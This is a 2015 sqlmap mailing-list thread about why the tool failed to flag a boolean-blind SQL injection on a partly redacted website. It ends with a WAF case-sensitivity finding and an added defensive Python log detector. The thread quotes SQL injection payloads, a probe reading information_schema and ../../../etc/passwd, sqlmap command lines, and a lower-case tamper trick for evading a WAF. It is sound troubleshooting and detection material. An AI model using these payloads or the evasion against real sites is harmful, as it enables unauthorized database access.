In the end, it was WAF behaviour that was preventing sqlmap from
identifying the parameter as injectable (more specifically, sqlmap was
sending SQL operators in upper case and the WAF was rejecting it). The
lower-case tamper script circumvented this but I was unable to take
exploitation any further because of other WAF blocking techniques.

On Thu, Apr 30, 2015 at 12:13 AM, Johnathon Doe <hood3dro...@gmail.com> wrote:
> Curious, have you tried using the --prefix and --suffix options to frame
> your injection to see if that helps?
>
> On Wed, Apr 29, 2015 at 2:10 AM, Alistair Johnson <amcljohn...@gmail.com>
> wrote:
>>
>> OK. You're right in that the following lines in your dummy output
>> should produce discernible responses when tested against the
>> application:
>> PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
>> PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
>>
>> I've verified this manually. Thanks and I'll send you the traffic output
>> file.
>>
>> Cheers,
>>
>> Alistair.
>>
>> On Wed, Apr 29, 2015 at 4:57 PM, Miroslav Stampar
>> <miroslav.stam...@gmail.com> wrote:
>> > I would say that you screwed something up. Can you please send that
>> > traffic file I requested.
>> >
>> > Down below find a line that says: "[08:55:08] [PAYLOAD]
>> > PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof
>> > that your claims are invalid.
>> >
>> > $ python sqlmap.py -u
>> > www.site.com/help/UserGuide.aspx?Sec=PackageSelection
>> > --dummy -v 3
>> >          _
>> >  ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
>> > |_ -| . | |     | .'| . |
>> > |___|_  |_|_|_|_|__,|  _|
>> >       |_|           |_|   http://sqlmap.org
>> >
>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
>> > prior
>> > mutual consent is illegal. It is the end user's responsibility to obey
>> > all
>> > applicable local, state and federal laws. Developers assume no liability
>> > and
>> > are not responsible for any misuse or damage caused by this program
>> >
>> > [*] starting at 08:55:05
>> >
>> > [08:55:05] [DEBUG] cleaning up configuration parameters
>> > [08:55:05] [DEBUG] setting the HTTP timeout
>> > [08:55:05] [DEBUG] creating HTTP requests opener object
>> > [08:55:05] [DEBUG] heuristically checking if the target is protected by
>> > some
>> > kind of WAF/IPS/IDS
>> > [08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name
>> > FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
>> > [08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
>> > [08:55:05] [INFO] testing if the target URL is stable. This can take a
>> > couple of seconds
>> > [08:55:06] [WARNING] target URL is not stable. sqlmap will base the page
>> > comparison on a sequence matcher. If no dynamic nor injectable
>> > parameters
>> > are detected, or in case of junk results, refer to user's manual
>> > paragraph
>> > 'Page comparison' and provide a string or regular expression to match on
>> > how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
>> > [08:55:08] [INFO] searching for dynamic content
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
>> > [08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to
>> > retry the request
>> > [08:55:08] [INFO] searching for dynamic content
>> > [08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
>> > [08:55:08] [PAYLOAD] 2485
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
>> > [08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
>> > [08:55:08] [PAYLOAD] 8682
>> > [08:55:08] [INFO] GET parameter 'Sec' is dynamic
>> > [08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
>> > [08:55:08] [WARNING] heuristic (basic) test shows that GET parameter
>> > 'Sec'
>> > might not be injectable
>> > [08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
>> > [08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
>> > [08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> > clause'
>> > [08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
>> > [08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
>> > [08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
>> > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
>> > [08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
>> > [08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
>> > [08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
>> > [08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
>> > [08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
>> > [08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
>> > [08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
>> > [08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
>> > [08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
>> > [08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
>> > [08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
>> > [08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
>> > ...
>> >
>> > On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson
>> > <amcljohn...@gmail.com>
>> > wrote:
>> >>
>> >> Hi Brandon,
>> >>
>> >> Thanks for your comment. Confirming that I've tried risk=3 with
>> >> level=5 with the same results. I've looked more closely at the
>> >> requests that sqlmap is sending to check if the parameter is
>> >> injectable. It is testing the Sec parameter with values such as:
>> >>
>> >> PackageSelection) AND 1477=7114
>> >> PackageSelection) AND 1631=1631
>> >> PackageSelection') AND 5603=7729
>> >> PackageSelection') AND 1631=1631
>> >> PackageSelection' AND 3943=9381
>> >> PackageSelection' AND 1631=1631
>> >> PackageSelection" AND 3324=4690
>> >> PackageSelection" AND 1631=1631
>> >> PackageSelection) AND 4734=6616 AND (6346=6346
>> >> PackageSelection)) AND 7350=9272 AND (8861=8861
>> >>
>> >> When in fact, I assume it would need to use logic like I used to get
>> >> distinguishable responses:
>> >>
>> >> PackageSelection (returns response A)
>> >> PackageSelection' AND '1'='1 (returns response A)
>> >> PackageSelection' AND '1'='2 (returns response B)
>> >>
>> >> In a nutshell, it doesn't appear to be trying single quotes and values
>> >> in the ' AND '1'='1 pattern. But I would have thought this is a pretty
>> >> typical format for checking boolean-based blind SQLi.
>> >>
>> >> Cheers,
>> >>
>> >> Alistair.
>> >>
>> >> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
>> >> <bperry.volat...@gmail.com> wrote:
>> >> > It's a GET, so there wouldn't be a content type, unless I am
>> >> > mistaken.
>> >> >
>> >> > Alistair, have you tried --risk=3 with --level=5 yet?
>> >> >
>> >> > Sent from a phone
>> >> >
>> >> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar
>> >> > <miroslav.stam...@gmail.com>
>> >> > wrote:
>> >> >
>> >> > Can you please send the unredacted content of request.txt to my
>> >> > address?
>> >> >
>> >> > If not, then please at least send me the content of traffic file
>> >> > which
>> >> > you
>> >> > can obtain by just appending the "-t traffic.txt" to the regular
>> >> > sqlmap's
>> >> > run.
>> >> >
>> >> > Bye
>> >> >
>> >> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson
>> >> > <amcljohn...@gmail.com>
>> >> > wrote:
>> >> >>
>> >> >> Thanks for the quick reply.
>> >> >>
>> >> >> The contents of the request file are as follows:
>> >> >>
>> >> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
>> >> >> Host: <redacted>
>> >> >> Accept: */*
>> >> >> Accept-Language: en
>> >> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1;
>> >> >> Win64;
>> >> >> x64; Trident/5.0)
>> >> >> Connection: close
>> >> >> Referer: <redacted>
>> >> >> Cookie: <redacted>
>> >> >>
>> >> >> I've redacted some of the details as it's not appropriate to draw
>> >> >> attention to an internet facing application's SQLi vulnerability.
>> >> >>
>> >> >> When providing the request file as part of the following command:
>> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> >> 'industries' -v 1
>> >> >>
>> >> >> sqlmap executes as normal but cannot identify (and therefore cannot
>> >> >> exploit) the boolean-based blind vulnerability which I've verified
>> >> >> manually.
>> >> >>
>> >> >> Thanks again,
>> >> >>
>> >> >> Al.
>> >> >>
>> >> >>
>> >> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
>> >> >> <miroslav.stam...@gmail.com> wrote:
>> >> >> > And what is the content of request file?
>> >> >> >
>> >> >> > Bye
>> >> >> >
>> >> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
>> >> >> > <amcljohn...@gmail.com>
>> >> >> > wrote:
>> >> >> >>
>> >> >> >> Hi sqlmappers,
>> >> >> >>
>> >> >> >> I'm a fairly experienced user of sqlmap having used it
>> >> >> >> extensively
>> >> >> >> in
>> >> >> >> the past. I came across what appeared to be pretty typical
>> >> >> >> boolean-based
>> >> >> >> blind SQLi in an application I'm (legally) testing. However, for
>> >> >> >> the
>> >> >> >> first time, I'm unable to get sqlmap to recognise the parameter
>> >> >> >> as
>> >> >> >> vulnerable to exploit it further. And as we know, manually
>> >> >> >> exploiting
>> >> >> >> blind SQLi is cumbersome to say the least.
>> >> >> >>
>> >> >> >> Here is a summary of the requests I've made to manually confirm
>> >> >> >> the
>> >> >> >> vulnerability.
>> >> >> >>
>> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
>> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns
>> >> >> >> response
>> >> >> >> A)
>> >> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns
>> >> >> >> response
>> >> >> >> B)
>> >> >> >>
>> >> >> >> I've tried various sqlmap flags and thought the following command
>> >> >> >> would give me the best chance of success:
>> >> >> >>
>> >> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
>> >> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
>> >> >> >> 'industries' -v 1
>> >> >> >>
>> >> >> >> Note: the string 'industries' is text that appears in response A
>> >> >> >> but
>> >> >> >> not response B.
>> >> >> >>
>> >> >> >> I've looked at the requests that sqlmap is sending in the
>> >> >> >> background
>> >> >> >> (proxied through burp). It appears that it's attempting to
>> >> >> >> exploit
>> >> >> >> this with the AND statement as it should but is not using single
>> >> >> >> quotes as per my example above.
>> >> >> >>
>> >> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap,
>> >> >> >> I'd
>> >> >> >> be
>> >> >> >> more than happy to contribute some time to improve it so it can
>> >> >> >> identify injectable parameters such as these in the future.
>> >> >> >>
>> >> >> >> Thanks,
>> >> >> >>
>> >> >> >> Al.
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >>
>> >> >> >> ------------------------------------------------------------------------------
>> >> >> >> One dashboard for servers and applications across
>> >> >> >> Physical-Virtual-Cloud
>> >> >> >> Widest out-of-the-box monitoring support with 50+ applications
>> >> >> >> Performance metrics, stats and reports that give you Actionable
>> >> >> >> Insights
>> >> >> >> Deep dive visibility with transaction tracing using APM Insight.
>> >> >> >> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
>> >> >> >> _______________________________________________
>> >> >> >> sqlmap-users mailing list
>> >> >> >> sqlmap-users@lists.sourceforge.net
>> >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >> >> >
>> >> >> >
>> >> >> >
>> >> >> >
>> >> >> > --
>> >> >> > Miroslav Stampar
>> >> >> > http://about.me/stamparm
>> >> >
>> >> >
>> >> >
>> >> >
>> >> > --
>> >> > Miroslav Stampar
>> >> > http://about.me/stamparm
>> >> >
>> >> >
>> >> >
>> >
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>>
>>
>
>
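The thread's conclusion is that the WAF in front of the application rejected the upper-case "AND" that sqlmap sends but passed the lower-case probes Alistair typed by hand. The following is an added example (it is not code from the thread's participants or from the sqlmap project) showing the same gap from the log-reviewing side: a case-sensitive rule modelled on that WAF beside a normalised one that decodes the query string, lower-cases it and then looks for a boolean-blind probe, and a pairing step that flags a client sending both a tautology and a contradiction against one parameter. The log lines are constructed for this example in abbreviated combined-log format; only the request URIs echo the probes quoted in the thread, and the NAIVE_RE rule is an assumption about what the WAF matched, based solely on the thread's description.

```python
"""
Case-insensitive detection of boolean-based blind SQLi probes in web logs.

Added example, not part of the mailing-list thread or of sqlmap itself.
The log lines below are constructed; the request URIs reproduce the probes
quoted in the thread (the hand-made lower-case ones and sqlmap's own).
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log (abbreviated combined log format).
SAMPLE_LOG = """\
10.0.0.5 - - [28/Apr/2015:13:03:01 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1" 200 5120
10.0.0.5 - - [28/Apr/2015:13:03:02 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 HTTP/1.1" 200 5120
10.0.0.5 - - [28/Apr/2015:13:03:03 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 HTTP/1.1" 200 3880
10.0.0.9 - - [29/Apr/2015:08:55:08 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%27%20AND%201595%3D1103%20AND%20%27cBLQ%27%3D%27cBLQ HTTP/1.1" 403 512
10.0.0.9 - - [29/Apr/2015:08:55:08 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%27%20AND%201559%3D1559%20AND%20%27uIvd%27%3D%27uIvd HTTP/1.1" 403 512
10.0.0.7 - - [29/Apr/2015:09:00:00 +0000] "GET /help/UserGuide.aspx?Sec=Billing HTTP/1.1" 200 4100
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]+" (?P<status>\d{3}) (?P<size>\d+)'
)

# Assumed model of the WAF from the thread: it only knows the upper-case
# spelling of the operator, so "'+and+'1'='1" is never matched.
NAIVE_RE = re.compile(r"' AND ")

# Normalised rule: a quote, a boolean operator, then a comparison of two
# operands. It is applied to a decoded, lower-cased, whitespace-collapsed
# value, so case and URL encoding no longer matter.
COMPARISON_RE = re.compile(r"""['"]\s*(?:and|or)\s+'?(\w+)'?\s*=\s*'?(\w+)'?""")


def normalise(value: str) -> str:
    """Lower-case and collapse whitespace (parse_qsl has already URL-decoded)."""
    return re.sub(r"\s+", " ", value).lower()


def classify(value: str):
    """Return 'tautology', 'contradiction' or None for one parameter value."""
    m = COMPARISON_RE.search(normalise(value))
    if not m:
        return None
    return "tautology" if m.group(1) == m.group(2) else "contradiction"


def parse_line(line: str):
    """Split one access-log line into fields plus decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["uri"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def analyse(log_text: str):
    """Run both rules over every parameter of every request."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            kind = classify(value)
            if kind is None:
                continue
            findings.append({
                "ip": rec["ip"], "path": rec["path"], "param": name,
                "kind": kind, "status": rec["status"],
                # Case-sensitive rule on the decoded value, as the WAF would see it.
                "naive_hit": bool(NAIVE_RE.search(value)),
            })
    return findings


def probe_pairs(findings):
    """A client that sends both a tautology and a contradiction against the
    same path/parameter is doing boolean-blind differencing, whatever the
    case of the keyword."""
    seen = defaultdict(set)
    for f in findings:
        seen[(f["ip"], f["path"], f["param"])].add(f["kind"])
    return sorted(k for k, kinds in seen.items()
                  if {"tautology", "contradiction"} <= kinds)


if __name__ == "__main__":
    found = analyse(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']} {f['param']}={f['kind']:<13} "
              f"naive_rule={'hit' if f['naive_hit'] else 'miss'} status={f['status']}")
    for ip, path, param in probe_pairs(found):
        print(f"boolean-blind probe pair: {ip} -> {path} parameter {param}")
```

Run as-is, the naive rule hits only the two sqlmap requests (which the WAF also answered with 403 in the constructed log) and misses both hand-made lower-case probes, while the normalised rule classifies all four and the pairing step reports both clients; in a real deployment the pairing window would be bounded by time rather than by the whole file.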
